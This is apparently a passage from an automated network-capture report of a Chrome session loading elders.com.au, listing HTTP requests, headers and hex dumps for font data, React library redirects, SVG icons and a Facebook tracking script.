                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 00 37 01 e7 00 2d 02 3f 00 41 02 04 00 2d 02 42 00 41 02 41 00 32 01 d5 00 41 02 33 00 37 01 c9 00 3a 02 1b 00 05 02 8d 00 37 02 43 00 1f 01 d0 00 19 02 24 00 0b 02 3a 00 4c 02 3a 00 3d 02 3a 00 7b 02 3a 00 4f 02 3a 00 4d 02 3a 00 39 02 3a 00 60 02 3a 00 3e 02 3a 00 43 02 3a 00 3d 02 3a 00 3a 02 3a 00 83 02 3a 00 59 02 3a 00 8e 02 3a 00 2e 02 3a 00 00 02 3a 00 27 02 3a 00 3b 02 3a 00 38 02 3a 00 0b 03 94 00 69 04 b7 00 69 02 bb 00 69 03 da 00 37 02 10 00 0f 02 44 00 69 02 02 00 46 02 52 00 69 01 f4 00 69 01 ca 00 69 02 5a 00 46 02 62 00 69 01 23 00 69 01 1d 00 0d 02 07 00 69 01 9e 00 69 02 ee 00 50 02 65 00 69 02 76 00 46 02 01 00 69 02 76 00 46 02 15 00 69 02 1b 00 37 01 c9 00 19 02 5e 00 64 01 df ff fb 02 b8 00 05 01 e0 00 05 01 cc ff fb 01 d6 00 2d 02
                                                                                                                                    Data Ascii: 7-?A-BAA2A37:7C$:L:=:{:O:M:9:`:>:C:=::::Y::.::':;:8:iii7DiFRiiiZFbi#iiiPeivFivFi7^d-
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 19 03 68 00 94 03 68 00 19 03 68 00 94 03 68 00 4f 03 68 00 4f 03 68 00 4f 03 68 00 4f 01 e1 ff 26 01 e1 ff fb 01 e1 ff fb 02 35 00 4b 02 15 00 3c 02 c0 00 4b 01 e1 ff fb 01 cf 00 05 01 cf 00 05 01 cf 00 05 01 cf 00 05 02 a0 00 15 03 e5 00 19 04 f3 00 19 03 f8 00 41 03 f3 00 41 03 bd 00 41 02 c9 00 41 03 18 00 41 02 10 00 86 01 e5 00 61 00 01 fe 5e 00 01 fe 59 00 01 fe 89 00 01 fe 94 00 01 ff 82 01 22 00 4e 01 22 00 4e 02 30 00 7e 02 71 00 9b 02 9b 00 be 01 22 00 4e 03 54 00 2f 02 46 00 2f 03 4d 00 2f 03 5f 00 2f 03 85 00 2f 03 4f 00 2f 02 36 00 2f 02 40 00 2f 03 1a 00 2f 02 62 00 2f 03 57 00 2f 03 1c 00 2f 03 fa 00 2f 03 0e 00 2f 03 45 00 52 02 25 00 82 02 25 00 75 01 44 00 19 02 25 00 ae 02 25 00 69 01 cb 00 41 01 9b 00 2b 00 fc 00 41 02 11 00 ad 02 25
                                                                                                                                    Data Ascii: hhhhOhOhOhO&5K<KAAAAAa^Y"N"N0~q"NT/F/M/_//O/6/@//b/W////ER%%uD%%iA+A%
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 00 3b 00 3c 00 3d 00 3e 00 3f 00 40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 00 00 87 00 88 00 8a 00 8c 00 94 00 99 00 9f 00 a4 00 a3 00 a5 00 a7 00 a6 00 a8 00 aa 00 ac 00 ab 00 ad 00 ae 00 b0 00 af 00 b1 00 b2 00 b4 00 b6 00 b5 00 b7 00 b9 00 b8 00 bd 00 bc 00 be 00 bf 02 67 00 73 00 65 00 66 00 6a 02 69 00 79 00 a2 00 71 00 6c 02 87 00 77 00 6b 02 ac 00 89 00 9b 02 a9 00 74 02 ad 02 ae 00 68 00 78 02 a2 02 a5 02 a4 01 b3 02 aa 00 6d 00 7d 01 9c 00 a9 00 bb 00 82 00 64 00 6f 02 a8 01 44 02 ab 02 a3 00 6e 00 7e 02 6a 00 63 00 83 00 86 00 98 01 15 01 16 02 5e 02 5f 02 64 02 65 02 61 02 62 00
                                                                                                                                    Data Ascii: ;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abgsefjiyqlwkthxm}doDn~jc^_deab
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 32 5f 80 5f ae 5f e0 5f f6 60 28 60 3c 60 72 60 9c 60 ae 60 da 61 30 61 48 61 60 61 80 61 9a 61 b8 61 e0 62 0e 62 34 62 60 62 9a 62 e0 63 18 63 66 63 a4 63 bc 63 ea 64 1e 64 36 64 60 64 82 64 ca 64 fa 65 2c 65 82 65 ac 65 ec 66 02 66 32 66 60 66 9c 66 d2 67 00 67 26 67 38 67 4a 67 64 67 7c 68 1a 68 a8 68 fe 69 4a 69 a8 69 fe 6a 1a 6a 34 6a 52 6a 72 6a 96 6a be 6a de 6a fc 6b 22 6b 46 6b 6e 6b 96 6b b6 6b e0 6b ec 6b fe 6c 30 6c 62 6c 8a 6c b2 6c ee 6d 24 6d 5e 6d 90 6d d2 6e 0c 6e 4e 6e 88 6e e0 6f 30 6f 56 6f 7c 6f f2 70 18 70 4a 70 4a 70 4a 70 4a 70 58 70 66 70 74 70 94 70 b4 70 d4 71 0c 71 44 71 7c 71 92 71 b0 71 c2 71 f4 72 5a 72 6c 72 7c 72 8c 72 be 72 e8 73 18 73 4e 73 6e 73 b4 73 ee 74 16 74 46 74 5e 74 8e 74 c8 74 f2 75 20 75 56 75 74 75 ba 75 f4
                                                                                                                                    Data Ascii: 2____`(`<`r```a0aHa`aaaabb4b`bbccfcccdd6d`ddde,eeeff2f`ffgg&g8gJgdg|hhhiJiijj4jRjrjjjjk"kFknkkkkkl0lblllm$m^mmnnNnno0oVo|oppJpJpJpJpXpfptpppqqDq|qqqqrZrlr|rrrssNsnssttFt^tttu uVutuu
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: e3 38 e3 5a e3 7c e3 92 e3 a0 e3 b6 00 00 00 02 00 4c 00 00 01 e0 02 ae 00 03 00 07 00 00 33 11 21 11 25 21 11 21 4c 01 94 fe 9e 01 30 fe d0 02 ae fd 52 32 02 4a 00 02 00 55 ff f9 00 cf 02 bb 00 03 00 0e 00 00 13 03 23 03 13 14 06 22 26 35 34 36 33 32 16 c2 13 3c 13 6f 24 32 24 23 1a 19 24 02 bb fe 0b 01 e8 fd 8a 1a 25 24 1a 19 24 23 00 00 00 02 00 5f 01 d4 01 3a 02 c4 00 03 00 07 00 00 01 23 35 33 07 23 35 33 01 3a 48 48 93 48 48 01 d4 f0 f0 f0 00 02 00 23 00 00 02 13 02 c4 00 1b 00 1f 00 00 01 23 07 33 15 23 07 23 37 23 07 23 37 23 35 33 37 23 35 33 37 33 07 33 37 33 07 33 07 23 07 33 02 13 6b 15 62 6c 1e 43 1e 7e 1e 43 1e 62 6c 14 62 6c 1e 43 1e 7e 1e 43 1e 62 ae 7e 15 7e 01 af 98 42 d5 d5 d5 d5 42 98 42 d3 d3 d3 d3 42 98 00 00 03 00 37 ff 95 02 0c 03
                                                                                                                                    Data Ascii: 8Z|L3!%!!L0R2JU#"&54632<o$2$#$%$$#_:#53#53:HHHH##3##7##7#537#53733733#3kblC~CblblC~Cb~~BBBB7
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 27 36 33 32 16 15 14 06 07 16 01 cd 40 31 5c 87 25 0c 12 0c 32 81 80 2c 29 53 2e 5a 14 59 42 35 4a 55 23 65 6b 53 6b 41 38 40 69 6c 60 1d 36 03 35 03 72 49 3c 20 1e 38 03 0d 5a 31 3b 3b 29 53 5b 48 35 4f 10 0f 00 00 00 00 01 00 2d ff 39 01 f4 02 00 00 2a 00 00 21 23 22 26 23 15 16 1d 01 07 35 34 36 35 22 06 23 21 35 13 33 03 0e 02 07 36 3b 01 35 34 3f 02 15 14 06 14 15 32 36 3b 01 01 f4 37 06 14 01 01 4d 01 02 1f 07 fe fe e6 57 bf 07 13 11 01 0c 1b b1 04 0a 3e 01 01 18 08 31 01 0b 0b 07 94 17 a0 06 20 02 01 3e 01 c2 fe 8a 0e 22 1e 01 03 1d 22 38 8c 13 c9 14 25 14 01 02 00 00 01 00 3c ff 47 01 b5 01 f2 00 19 00 00 25 14 06 23 22 2f 01 16 33 32 36 35 34 26 23 22 07 13 21 07 23 07 36 33 32 16 01 b5 a9 78 25 25 0e 21 2a 5b 7d 4f 46 4e 31 20 01 28 0c d5 11 23
                                                                                                                                    Data Ascii: '632@1\%2,)S.ZYB5JU#ekSkA8@il`65rI< 8Z1;;)S[H5O-9*!#"&#5465"#!536;54?26;7MW>1 >""8%<G%#"/32654&#"!#632x%%!*[}OFN1 (#
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 2b 01 11 33 32 16 17 1e 01 15 14 06 07 16 17 16 07 34 26 27 26 2b 01 11 33 32 36 03 34 26 27 26 2b 01 15 33 32 36 37 36 02 20 39 32 1e 3f 48 b1 63 64 4d 1b 35 40 40 3b 3a 20 3e 56 2e 25 21 2f 79 92 49 41 22 2b 23 17 34 61 77 37 32 0f 0b bc 39 5c 13 0b 09 02 ae 06 09 12 57 34 35 4e 13 0b 19 2f 56 2d 45 07 07 ff 00 40 01 74 28 3b 09 06 e2 18 23 19 00 01 00 41 ff f5 02 1a 02 b7 00 19 00 00 25 06 23 22 27 26 35 34 36 33 32 17 07 26 23 22 07 06 15 14 17 1e 01 33 32 37 02 1a 56 69 78 50 52 a4 7c 64 49 2c 3b 47 76 33 1d 16 1a 62 3c 48 3e 2d 38 5b 5d a8 99 c9 38 35 2b 76 43 73 5a 37 3f 41 2c 00 00 00 00 02 00 5f 00 00 02 38 02 ae 00 0c 00 1a 00 00 01 14 07 0e 01 2b 01 11 33 32 16 17 16 07 34 26 27 2e 01 2b 01 11 33 32 36 37 36 02 38 4e 2c 61 4b b3 89 55 57 30 74
                                                                                                                                    Data Ascii: +324&'&+3264&'&+32676 92?HcdM5@@;: >V.%!/yIA"+#4aw729\W45N/V-E@t(;#A%#"'&54632&#"327VixPR|dI,;Gv3b<H>-8[]85+vCsZ7?A,_8+324&'.+326768N,aKUW0t


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    77192.168.2.449847104.17.249.2034435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC567OUTGET /react@18/umd/react.development.js HTTP/1.1
                                                                                                                                    Host: unpkg.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:21 UTC544INHTTP/1.1 302 Found
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    cache-control: public, s-maxage=600, max-age=60
                                                                                                                                    location: /react@18.3.1/umd/react.development.js
                                                                                                                                    vary: Accept
                                                                                                                                    via: 1.1 fly.io
                                                                                                                                    fly-request-id: 01JBXNG3KJGPGW1HMA5YM0WCGX-dfw
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 96
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac2fcb345b-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC66INData Raw: 33 63 0d 0a 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 72 65 61 63 74 40 31 38 2e 33 2e 31 2f 75 6d 64 2f 72 65 61 63 74 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0d 0a
                                                                                                                                    Data Ascii: 3cFound. Redirecting to /react@18.3.1/umd/react.development.js
                                                                                                                                    2024-11-05 08:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    78192.168.2.449848104.17.249.2034435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC575OUTGET /react-dom@18/umd/react-dom.development.js HTTP/1.1
                                                                                                                                    Host: unpkg.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:21 UTC553INHTTP/1.1 302 Found
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    cache-control: public, s-maxage=600, max-age=60
                                                                                                                                    location: /react-dom@18.3.1/umd/react-dom.development.js
                                                                                                                                    vary: Accept
                                                                                                                                    via: 1.1 fly.io
                                                                                                                                    fly-request-id: 01JBXN2GQFSMKGEQGNQAWBZ60C-dfw
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 542
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac2c3c2d33-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC74INData Raw: 34 34 0d 0a 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 72 65 61 63 74 2d 64 6f 6d 40 31 38 2e 33 2e 31 2f 75 6d 64 2f 72 65 61 63 74 2d 64 6f 6d 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0d 0a
                                                                                                                                    Data Ascii: 44Found. Redirecting to /react-dom@18.3.1/umd/react-dom.development.js
                                                                                                                                    2024-11-05 08:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    79192.168.2.449845162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC810OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"d3-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 649
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210087-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730260786.923085,VS0,VS0,VE672
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac2aed0b7e-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC217INData Raw: 64 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 68 2d 36 20 77 2d 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 3e 0a 20 20 3c 70 61 74 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 31 39 20 39 6c 2d 37 20 37 2d 37 2d 37 22 20 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                    Data Ascii: d3<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2"> <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" /></svg>
                                                                                                                                    2024-11-05 08:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    80192.168.2.449844162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC695OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"967-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 17536
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210127-DFW
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730248629.155532,VS0,VS0,VE4
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac29bb2e73-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC785INData Raw: 39 36 37 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 39 20 37 2e 35 43 39 20 37 2e 33 36 37 33 39 20 39 2e 30 35 32 36 38 20 37 2e 32 34 30 32 31 20 39 2e 31 34 36 34 35 20 37 2e 31 34 36 34 35 43 39 2e 32 34 30 32 31 20 37 2e 30 35 32 36 38 20 39 2e 33 36 37 33 39 20 37 20 39 2e 35 20 37 48 31 37 2e 35 43 31 37 2e 36 33 32 36 20 37 20 31 37 2e 37 35 39 38 20 37
                                                                                                                                    Data Ascii: 967<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 31 39 20 31 36 2e 35 56 37 2e 35 43 31 39 20 37 2e 31 30 32 31 38 20 31 38 2e 38 34 32 20 36 2e 37 32 30 36 34 20 31 38 2e 35 36 30 37 20 36 2e 34 33 39 33 34 43 31 38 2e 32 37 39 34 20 36 2e 31 35 38 30 34 20 31 37 2e 38 39 37 38 20 36 20 31 37 2e 35 20 36 48 39 2e 35 43 39 2e 31 30 32 31 38 20 36 20 38 2e 37 32 30 36 34 20 36 2e 31 35 38 30 34 20 38 2e 34 33 39 33 34 20 36 2e 34 33 39 33 34 43 38 2e 31 35 38 30 34 20 36 2e 37 32 30 36 34 20 38 20 37 2e 31 30 32 31 38 20 38 20 37 2e 35 56 39 2e 35 43 38 20 39 2e 36 33 32 36 31 20 38 2e 30 35 32 36 38 20 39 2e 37 35 39 37 39 20 38 2e 31 34 36 34 35 20 39 2e 38 35 33 35 35 43 38 2e 32 34 30 32 31 20 39 2e 39 34 37 33 32 20 38 2e 33 36 37 33 39 20 31 30 20 38 2e 35 20 31 30 43 38 2e 36 33 32 36 31 20 31 30
                                                                                                                                    Data Ascii: 19 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9.94732 8.36739 10 8.5 10C8.63261 10
                                                                                                                                    2024-11-05 08:03:21 UTC260INData Raw: 2e 33 30 37 34 20 31 31 2e 31 34 36 20 31 35 2e 33 35 33 39 43 31 31 2e 31 39 32 35 20 31 35 2e 34 30 30 34 20 31 31 2e 32 34 37 37 20 31 35 2e 34 33 37 33 20 31 31 2e 33 30 38 34 20 31 35 2e 34 36 32 34 43 31 31 2e 33 36 39 32 20 31 35 2e 34 38 37 36 20 31 31 2e 34 33 34 33 20 31 35 2e 35 30 30 35 20 31 31 2e 35 20 31 35 2e 35 30 30 35 43 31 31 2e 35 36 35 37 20 31 35 2e 35 30 30 35 20 31 31 2e 36 33 30 38 20 31 35 2e 34 38 37 36 20 31 31 2e 36 39 31 36 20 31 35 2e 34 36 32 34 43 31 31 2e 37 35 32 33 20 31 35 2e 34 33 37 33 20 31 31 2e 38 30 37 35 20 31 35 2e 34 30 30 34 20 31 31 2e 38 35 34 20 31 35 2e 33 35 33 39 4c 31 34 2e 38 35 34 20 31 32 2e 33 35 33 39 56 31 32 2e 33 35 33 39 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76
                                                                                                                                    Data Ascii: .3074 11.146 15.3539C11.1925 15.4004 11.2477 15.4373 11.3084 15.4624C11.3692 15.4876 11.4343 15.5005 11.5 15.5005C11.5657 15.5005 11.6308 15.4876 11.6916 15.4624C11.7523 15.4373 11.8075 15.4004 11.854 15.3539L14.854 12.3539V12.3539Z" fill="#D21E24"/></sv
                                                                                                                                    2024-11-05 08:03:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    81192.168.2.449853157.240.253.14435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC534OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                    Host: connect.facebook.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:21 UTC1452INHTTP/1.1 200 OK
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                    timing-allow-origin: *
                                                                                                                                    reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                    report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                    content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-LV1wEhnI' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                    document-policy: force-load-at-top
